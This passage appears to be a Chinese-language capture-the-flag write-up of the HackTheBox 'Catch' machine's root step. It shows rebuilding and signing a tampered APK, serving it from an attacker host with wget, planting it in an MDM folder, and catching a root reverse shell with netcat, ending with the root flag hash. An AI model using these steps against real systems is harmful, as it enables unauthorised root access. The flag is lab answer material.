└─# java -jar apktool_2.6.1.jar b -f -d catchv1.0 -o catchv2.0.apk                                                                        1 ⨯
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
I: Using Apktool 2.6.1
I: Smaling smali folder into classes.dex...
I: Building resources...
I: Building apk file...
I: Copying unknown files/dir...
I: Built apk...

┌──(root💀kali)-[~/Desktop/catch]
└─# ls
apktool_2.6.1.jar  catchv1.0  catchv1.0.apk  catchv2.0.apk

然后去给 apk 签名,并且验证

keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore catchv2.0.apk alias_name

jarsigner -verify -verbose -certs catchv2.0.apk
┌──(root💀kali)-[~/Desktop/catch]
└─# keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
输入密钥库口令:  
再次输入新口令: 
您的名字与姓氏是什么?
  [Unknown]:  
您的组织单位名称是什么?
  [Unknown]:  
您的组织名称是什么?
  [Unknown]:  
您所在的城市或区域名称是什么?
  [Unknown]:  
您所在的省/市/自治区名称是什么?
  [Unknown]:  
该单位的双字母国家/地区代码是什么?
  [Unknown]:  
CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown是否正确?
  [否]:  y

正在为以下对象生成 2,048 位RSA密钥对和自签名证书 (SHA256withRSA) (有效期为 10,000 天):
         CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
[正在存储my-release-key.keystore]

┌──(root💀kali)-[~/Desktop/catch]
└─# ls my-release-key.keystore 
my-release-key.keystore

生成了一个签名文件,然后验证内容较多,就不放出来了,大家自行验证即可

使用 python3 -m 开启一个 HTTP 服务器

┌──(root💀kali)-[~/Desktop/catch]
└─# python3 -m http.server 80 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

然后使用 wget 下载这个 apk

will@catch:~$ wget http://10.10.14.9/catchv2.0.apk
--2022-04-06 09:28:38--  http://10.10.14.9/catchv2.0.apk
Connecting to 10.10.14.9:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2821343 (2.7M) [application/vnd.android.package-archive]
Saving to: ‘catchv2.0.apk’

catchv2.0.apk                       100%[=================================================================>]   2.69M   869KB/s    in 3.2s    

2022-04-06 09:28:42 (869 KB/s) - ‘catchv2.0.apk’ saved [2821343/2821343]

然后将下载的 apk 放入 /opt/mdm/apk_bin 文件夹

will@catch:~$ cp catchv2.0.apk /opt/mdm/apk_bin
will@catch:~$ ls /opt/mdm/apk_bin
catchv2.0.apk
┌──(root💀kali)-[~/Desktop]
└─# nc -nvlp 4444                                       
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.150] 34410
bash: cannot set terminal process group (397832): Inappropriate ioctl for device
bash: no job control in this shell
root@catch:~# whoami&&id
whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)

然后等待一会儿,我们就会获得一个 root 权限的 shell

root@catch:~# cd /root
cd /root
root@catch:~# cat root.txt
cat root.txt
36160af074e848d9139b7d14c9c4e5ca

成功拿到 root 权限的 flag 文件